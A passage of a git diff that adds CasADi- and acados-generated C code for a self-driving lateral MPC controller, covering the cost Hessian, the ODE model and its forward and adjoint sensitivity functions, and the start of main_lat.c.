+CASADI_SYMBOL_EXPORT void lat_cost_y_fun_jac_ut_xt_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int lat_cost_y_fun_jac_ut_xt_n_in(void) { return 3;} + +CASADI_SYMBOL_EXPORT casadi_int lat_cost_y_fun_jac_ut_xt_n_out(void) { return 2;} + +CASADI_SYMBOL_EXPORT casadi_real lat_cost_y_fun_jac_ut_xt_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_cost_y_fun_jac_ut_xt_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_cost_y_fun_jac_ut_xt_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + case 1: return "o1"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_cost_y_fun_jac_ut_xt_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_cost_y_fun_jac_ut_xt_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s3; + case 1: return casadi_s4; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_fun_jac_ut_xt_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 3; + if (sz_res) *sz_res = 2; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_hess.c b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_hess.c new file mode 100644 index 000000000..a437b9748 --- /dev/null +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_hess.c @@ -0,0 +1,148 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) lat_cost_y_hess_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) +#define casadi_s4 CASADI_PREFIX(s4) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +static const casadi_int casadi_s0[8] = {4, 1, 0, 4, 0, 1, 2, 3}; +static const casadi_int casadi_s1[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s2[9] = {5, 1, 0, 5, 0, 1, 2, 3, 4}; +static const casadi_int casadi_s3[6] = {2, 1, 0, 2, 0, 1}; +static const casadi_int casadi_s4[8] = {5, 5, 0, 0, 0, 0, 0, 0}; + +/* lat_cost_y_hess:(i0[4],i1,i2[5],i3[2])->(o0[5x5,0nz]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_hess(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_hess_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_hess_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_hess_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_hess_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_hess_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_hess_incref(void) { +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_hess_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int lat_cost_y_hess_n_in(void) { return 4;} + +CASADI_SYMBOL_EXPORT casadi_int lat_cost_y_hess_n_out(void) { return 1;} + +CASADI_SYMBOL_EXPORT casadi_real lat_cost_y_hess_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_cost_y_hess_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + case 3: return "i3"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_cost_y_hess_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_cost_y_hess_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + case 3: return casadi_s3; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_cost_y_hess_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s4; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_hess_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 4; + if (sz_res) *sz_res = 1; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_model/lat_expl_ode_fun.c b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_model/lat_expl_ode_fun.c new file mode 100644 index 000000000..b7c0a2211 --- /dev/null +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_model/lat_expl_ode_fun.c @@ -0,0 +1,164 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) lat_expl_ode_fun_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +static const casadi_int casadi_s0[8] = {4, 1, 0, 4, 0, 1, 2, 3}; +static const casadi_int casadi_s1[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s2[6] = {2, 1, 0, 2, 0, 1}; + +/* lat_expl_ode_fun:(i0[4],i1,i2[2])->(o0[4]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1, a2, a3, a4, a5; + a0=arg[2]? arg[2][0] : 0; + a1=arg[0]? arg[0][2] : 0; + a2=cos(a1); + a2=(a0*a2); + a3=arg[2]? arg[2][1] : 0; + a4=sin(a1); + a4=(a3*a4); + a5=arg[0]? arg[0][3] : 0; + a4=(a4*a5); + a2=(a2-a4); + if (res[0]!=0) res[0][0]=a2; + a2=sin(a1); + a0=(a0*a2); + a1=cos(a1); + a3=(a3*a1); + a3=(a3*a5); + a0=(a0+a3); + if (res[0]!=0) res[0][1]=a0; + if (res[0]!=0) res[0][2]=a5; + a5=arg[1]? arg[1][0] : 0; + if (res[0]!=0) res[0][3]=a5; + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_expl_ode_fun(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int lat_expl_ode_fun_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_expl_ode_fun_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_expl_ode_fun_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int lat_expl_ode_fun_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_expl_ode_fun_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void lat_expl_ode_fun_incref(void) { +} + +CASADI_SYMBOL_EXPORT void lat_expl_ode_fun_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int lat_expl_ode_fun_n_in(void) { return 3;} + +CASADI_SYMBOL_EXPORT casadi_int lat_expl_ode_fun_n_out(void) { return 1;} + +CASADI_SYMBOL_EXPORT casadi_real lat_expl_ode_fun_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_expl_ode_fun_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_expl_ode_fun_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_expl_ode_fun_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_expl_ode_fun_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int lat_expl_ode_fun_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 3; + if (sz_res) *sz_res = 1; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_model/lat_expl_vde_adj.c b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_model/lat_expl_vde_adj.c new file mode 100644 index 000000000..102db56e5 --- /dev/null +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_model/lat_expl_vde_adj.c @@ -0,0 +1,186 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) lat_expl_vde_adj_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +static const casadi_int casadi_s0[8] = {4, 1, 0, 4, 0, 1, 2, 3}; +static const casadi_int casadi_s1[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s2[6] = {2, 1, 0, 2, 0, 1}; +static const casadi_int casadi_s3[9] = {5, 1, 0, 5, 0, 1, 2, 3, 4}; + +/* lat_expl_vde_adj:(i0[4],i1[4],i2,i3[2])->(o0[5]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1, a2, a3, a4, a5, a6, a7; + a0=0.; + if (res[0]!=0) res[0][0]=a0; + if (res[0]!=0) res[0][1]=a0; + a0=arg[0]? arg[0][2] : 0; + a1=cos(a0); + a2=arg[3]? arg[3][0] : 0; + a3=arg[1]? arg[1][1] : 0; + a4=(a2*a3); + a1=(a1*a4); + a4=sin(a0); + a5=arg[3]? arg[3][1] : 0; + a6=arg[0]? arg[0][3] : 0; + a7=(a6*a3); + a7=(a5*a7); + a4=(a4*a7); + a1=(a1-a4); + a4=cos(a0); + a7=arg[1]? arg[1][0] : 0; + a6=(a6*a7); + a6=(a5*a6); + a4=(a4*a6); + a1=(a1-a4); + a4=sin(a0); + a2=(a2*a7); + a4=(a4*a2); + a1=(a1-a4); + if (res[0]!=0) res[0][2]=a1; + a1=arg[1]? arg[1][2] : 0; + a4=cos(a0); + a4=(a5*a4); + a4=(a4*a3); + a1=(a1+a4); + a0=sin(a0); + a5=(a5*a0); + a5=(a5*a7); + a1=(a1-a5); + if (res[0]!=0) res[0][3]=a1; + a1=arg[1]? arg[1][3] : 0; + if (res[0]!=0) res[0][4]=a1; + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_expl_vde_adj(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int lat_expl_vde_adj_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_expl_vde_adj_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_expl_vde_adj_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int lat_expl_vde_adj_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_expl_vde_adj_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void lat_expl_vde_adj_incref(void) { +} + +CASADI_SYMBOL_EXPORT void lat_expl_vde_adj_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int lat_expl_vde_adj_n_in(void) { return 4;} + +CASADI_SYMBOL_EXPORT casadi_int lat_expl_vde_adj_n_out(void) { return 1;} + +CASADI_SYMBOL_EXPORT casadi_real lat_expl_vde_adj_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_expl_vde_adj_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + case 3: return "i3"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_expl_vde_adj_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_expl_vde_adj_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s0; + case 2: return casadi_s1; + case 3: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_expl_vde_adj_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s3; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int lat_expl_vde_adj_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 4; + if (sz_res) *sz_res = 1; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_model/lat_expl_vde_forw.c b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_model/lat_expl_vde_forw.c new file mode 100644 index 000000000..0e8c4af2f --- /dev/null +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_model/lat_expl_vde_forw.c @@ -0,0 +1,299 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) lat_expl_vde_forw_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +static const casadi_int casadi_s0[8] = {4, 1, 0, 4, 0, 1, 2, 3}; +static const casadi_int casadi_s1[23] = {4, 4, 0, 4, 8, 12, 16, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3}; +static const casadi_int casadi_s2[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s3[6] = {2, 1, 0, 2, 0, 1}; + +/* lat_expl_vde_forw:(i0[4],i1[4x4],i2[4],i3,i4[2])->(o0[4],o1[4x4],o2[4]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1, a10, a11, a12, a13, a14, a15, a2, a3, a4, a5, a6, a7, a8, a9; + a0=arg[4]? arg[4][0] : 0; + a1=arg[0]? arg[0][2] : 0; + a2=cos(a1); + a2=(a0*a2); + a3=arg[4]? arg[4][1] : 0; + a4=sin(a1); + a4=(a3*a4); + a5=arg[0]? arg[0][3] : 0; + a6=(a4*a5); + a2=(a2-a6); + if (res[0]!=0) res[0][0]=a2; + a2=sin(a1); + a2=(a0*a2); + a6=cos(a1); + a6=(a3*a6); + a7=(a6*a5); + a2=(a2+a7); + if (res[0]!=0) res[0][1]=a2; + if (res[0]!=0) res[0][2]=a5; + a2=arg[3]? arg[3][0] : 0; + if (res[0]!=0) res[0][3]=a2; + a2=sin(a1); + a7=arg[1]? arg[1][2] : 0; + a8=(a2*a7); + a8=(a0*a8); + a9=cos(a1); + a10=(a9*a7); + a10=(a3*a10); + a10=(a5*a10); + a11=arg[1]? arg[1][3] : 0; + a12=(a4*a11); + a10=(a10+a12); + a8=(a8+a10); + a8=(-a8); + if (res[1]!=0) res[1][0]=a8; + a8=cos(a1); + a10=(a8*a7); + a10=(a0*a10); + a12=(a6*a11); + a13=sin(a1); + a7=(a13*a7); + a7=(a3*a7); + a7=(a5*a7); + a12=(a12-a7); + a10=(a10+a12); + if (res[1]!=0) res[1][1]=a10; + if (res[1]!=0) res[1][2]=a11; + a11=0.; + if (res[1]!=0) res[1][3]=a11; + a10=arg[1]? arg[1][6] : 0; + a12=(a2*a10); + a12=(a0*a12); + a7=(a9*a10); + a7=(a3*a7); + a7=(a5*a7); + a14=arg[1]? arg[1][7] : 0; + a15=(a4*a14); + a7=(a7+a15); + a12=(a12+a7); + a12=(-a12); + if (res[1]!=0) res[1][4]=a12; + a12=(a8*a10); + a12=(a0*a12); + a7=(a6*a14); + a10=(a13*a10); + a10=(a3*a10); + a10=(a5*a10); + a7=(a7-a10); + a12=(a12+a7); + if (res[1]!=0) res[1][5]=a12; + if (res[1]!=0) res[1][6]=a14; + if (res[1]!=0) res[1][7]=a11; + a14=arg[1]? arg[1][10] : 0; + a12=(a2*a14); + a12=(a0*a12); + a7=(a9*a14); + a7=(a3*a7); + a7=(a5*a7); + a10=arg[1]? arg[1][11] : 0; + a15=(a4*a10); + a7=(a7+a15); + a12=(a12+a7); + a12=(-a12); + if (res[1]!=0) res[1][8]=a12; + a12=(a8*a14); + a12=(a0*a12); + a7=(a6*a10); + a14=(a13*a14); + a14=(a3*a14); + a14=(a5*a14); + a7=(a7-a14); + a12=(a12+a7); + if (res[1]!=0) res[1][9]=a12; + if (res[1]!=0) res[1][10]=a10; + if (res[1]!=0) res[1][11]=a11; + a10=arg[1]? arg[1][14] : 0; + a2=(a2*a10); + a2=(a0*a2); + a9=(a9*a10); + a9=(a3*a9); + a9=(a5*a9); + a12=arg[1]? arg[1][15] : 0; + a7=(a4*a12); + a9=(a9+a7); + a2=(a2+a9); + a2=(-a2); + if (res[1]!=0) res[1][12]=a2; + a8=(a8*a10); + a8=(a0*a8); + a2=(a6*a12); + a13=(a13*a10); + a13=(a3*a13); + a13=(a5*a13); + a2=(a2-a13); + a8=(a8+a2); + if (res[1]!=0) res[1][13]=a8; + if (res[1]!=0) res[1][14]=a12; + if (res[1]!=0) res[1][15]=a11; + a11=sin(a1); + a12=arg[2]? arg[2][2] : 0; + a11=(a11*a12); + a11=(a0*a11); + a8=cos(a1); + a8=(a8*a12); + a8=(a3*a8); + a8=(a5*a8); + a2=arg[2]? arg[2][3] : 0; + a4=(a4*a2); + a8=(a8+a4); + a11=(a11+a8); + a11=(-a11); + if (res[2]!=0) res[2][0]=a11; + a11=cos(a1); + a11=(a11*a12); + a0=(a0*a11); + a6=(a6*a2); + a1=sin(a1); + a1=(a1*a12); + a3=(a3*a1); + a5=(a5*a3); + a6=(a6-a5); + a0=(a0+a6); + if (res[2]!=0) res[2][1]=a0; + if (res[2]!=0) res[2][2]=a2; + a2=1.; + if (res[2]!=0) res[2][3]=a2; + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_expl_vde_forw(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int lat_expl_vde_forw_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_expl_vde_forw_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_expl_vde_forw_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int lat_expl_vde_forw_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_expl_vde_forw_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void lat_expl_vde_forw_incref(void) { +} + +CASADI_SYMBOL_EXPORT void lat_expl_vde_forw_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int lat_expl_vde_forw_n_in(void) { return 5;} + +CASADI_SYMBOL_EXPORT casadi_int lat_expl_vde_forw_n_out(void) { return 3;} + +CASADI_SYMBOL_EXPORT casadi_real lat_expl_vde_forw_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_expl_vde_forw_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + case 3: return "i3"; + case 4: return "i4"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_expl_vde_forw_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + case 1: return "o1"; + case 2: return "o2"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_expl_vde_forw_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s0; + case 3: return casadi_s2; + case 4: return casadi_s3; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_expl_vde_forw_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s0; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int lat_expl_vde_forw_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 5; + if (sz_res) *sz_res = 3; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/main_lat.c b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/main_lat.c new file mode 100644 index 000000000..53809769a --- /dev/null +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/main_lat.c @@ -0,0 +1,216 @@ +/* + * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, + * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, + * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, + * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl + * + * This file is part of acados. + * + * The 2-Clause BSD License + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, + * this list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE + * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS + * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN + * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) + * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + * POSSIBILITY OF SUCH DAMAGE.; + */ + + +// standard +#include +#include +// acados +#include "acados/utils/print.h" +#include "acados/utils/math.h" +#include "acados_c/ocp_nlp_interface.h" +#include "acados_c/external_function_interface.h" +#include "acados_solver_lat.h" + +#define NX LAT_NX +#define NZ LAT_NZ +#define NU LAT_NU +#define NP LAT_NP +#define NBX LAT_NBX +#define NBX0 LAT_NBX0 +#define NBU LAT_NBU +#define NSBX LAT_NSBX +#define NSBU LAT_NSBU +#define NSH LAT_NSH +#define NSG LAT_NSG +#define NSPHI LAT_NSPHI +#define NSHN LAT_NSHN +#define NSGN LAT_NSGN +#define NSPHIN LAT_NSPHIN +#define NSBXN LAT_NSBXN +#define NS LAT_NS +#define NSN LAT_NSN +#define NG LAT_NG +#define NBXN LAT_NBXN +#define NGN LAT_NGN +#define NY0 LAT_NY0 +#define NY LAT_NY +#define NYN LAT_NYN +#define NH LAT_NH +#define NPHI LAT_NPHI 